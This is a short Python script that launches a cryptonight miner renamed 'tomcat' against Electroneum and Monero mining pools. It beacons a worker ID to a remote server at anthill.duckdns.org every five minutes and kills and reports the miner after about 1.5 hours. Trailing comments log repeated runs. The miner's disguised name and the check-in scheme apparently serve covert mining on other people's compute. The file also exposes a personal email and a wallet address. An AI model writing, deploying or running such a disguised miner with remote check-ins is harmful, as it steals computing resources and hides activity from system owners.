import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:50:09.714978
#2018-02-17 16:35:06.260956
#2018-02-17 18:22:07.459229
#2018-02-17 20:10:06.811261
#2018-02-17 21:57:07.120390
#2018-02-17 23:42:05.284096
#2018-02-18 01:32:05.280887
#2018-02-18 03:18:05.093518
#2018-02-18 05:06:07.476902
#2018-02-18 06:59:05.504717
#2018-02-18 08:46:05.556264
#2018-02-18 10:33:07.186499
#2018-02-18 12:17:06.476588
#2018-02-18 14:04:04.821487
#2018-02-18 15:54:06.068503
#2018-02-18 17:45:03.183991
#2018-02-18 19:32:05.887370
#2018-02-18 21:17:05.978159
#2018-02-18 23:04:06.413617
#2018-02-19 00:51:01.395497
#2018-02-19 02:38:07.267211
#2018-02-19 04:24:06.473374
#2018-02-19 06:09:01.895255
#2018-02-19 07:57:06.481995
#2018-02-19 09:48:05.437778
#2018-02-19 11:38:05.831738
#2018-02-19 13:25:05.500946
#2018-02-19 15:13:04.274054
#2018-02-19 17:01:05.069167
#2018-02-19 18:47:06.724597
#2018-02-19 20:38:07.854834
#2018-02-19 22:25:05.344860
#2018-02-20 00:11:05.903714
#2018-02-20 01:58:01.248576
#2018-02-20 03:48:03.841329
#2018-02-20 05:34:01.291006
#2018-02-20 07:18:04.011310
#2018-02-20 09:04:06.267030
#2018-02-20 10:47:01.683907
#2018-02-20 12:34:01.702244
#2018-02-20 14:21:04.523015
#2018-02-20 16:04:09.127809
#2018-02-20 17:51:07.121496
#2018-02-20 19:42:09.563592
#2018-02-20 21:28:01.587626
#2018-02-20 23:11:04.682716
#2018-02-21 00:54:07.714959
#2018-02-21 02:42:03.768814
#2018-02-21 04:29:04.177725
#2018-02-21 06:16:05.147114
#2018-02-21 08:02:01.797533
#2018-02-21 09:47:08.512972
#2018-02-21 11:36:07.365639
#2018-02-21 13:26:09.287656
#2018-02-21 15:12:07.353922
#2018-02-21 17:02:09.419185
#2018-02-21 18:51:01.906935
#2018-02-21 20:37:07.232882
#2018-02-21 22:23:08.548308
#2018-02-22 00:13:08.291764
#2018-02-22 02:02:07.489713
#2018-02-22 03:48:01.468803
#2018-02-22 05:34:06.776121
#2018-02-22 07:19:05.341970
#2018-02-22 09:06:02.110124
#2018-02-22 10:53:07.431327
#2018-02-22 12:40:07.342708
#2018-02-22 14:26:06.785667
#2018-02-22 16:14:05.420156
#2018-02-22 18:01:10.387541
#2018-02-22 19:49:04.300970
#2018-02-22 21:39:01.341251
#2018-02-22 23:26:08.997280
#2018-02-23 01:16:05.408670
#2018-02-23 03:03:07.566382
#2018-02-23 04:48:01.779029
#2018-02-23 06:35:06.121934
#2018-02-23 08:23:07.129733
#2018-02-23 10:40:09.391055
#2018-02-23 12:36:04.821965
#2018-02-23 14:22:06.759845
#2018-02-23 16:13:01.956023
#2018-02-23 17:59:01.720870
#2018-02-23 19:45:11.007827
#2018-02-23 21:29:06.062838
#2018-02-23 23:17:06.996737
#2018-02-24 01:07:06.346332
#2018-02-24 02:57:01.761276
#2018-02-24 04:45:09.209520
#2018-02-24 06:31:07.169591
#2018-02-24 08:19:07.082511
#2018-02-24 10:03:04.787811
#2018-02-24 12:00:09.790375
#2018-02-24 13:48:07.279494
#2018-02-24 15:38:01.448958
#2018-02-24 17:32:06.293844
#2018-02-24 19:18:07.761777
#2018-02-24 21:07:03.925322
#2018-02-25 01:21:05.642424
#2018-02-25 05:28:06.669875
#2018-02-25 11:35:01.780855